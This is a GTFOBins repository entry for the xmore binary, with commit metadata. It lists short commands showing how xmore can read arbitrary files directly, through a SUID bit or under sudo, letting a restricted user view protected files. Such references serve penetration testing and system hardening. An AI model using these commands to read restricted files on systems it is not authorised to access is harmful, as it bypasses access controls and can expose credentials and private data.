GTFOBins.github.io/_gtfobins/xmore.md
Kiran Ghimire 379a19bf32
Add xmore
2021-05-07 14:13:06 +02:00

17 lines
339 B
Markdown

---
description: The file is displayed in a Xorg window, so it needs a working graphical environment.
functions:
file-read:
- code: |
LFILE=file_to_read
xmore $LFILE
suid:
- code: |
LFILE=file_to_read
./xmore $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo xmore $LFILE
---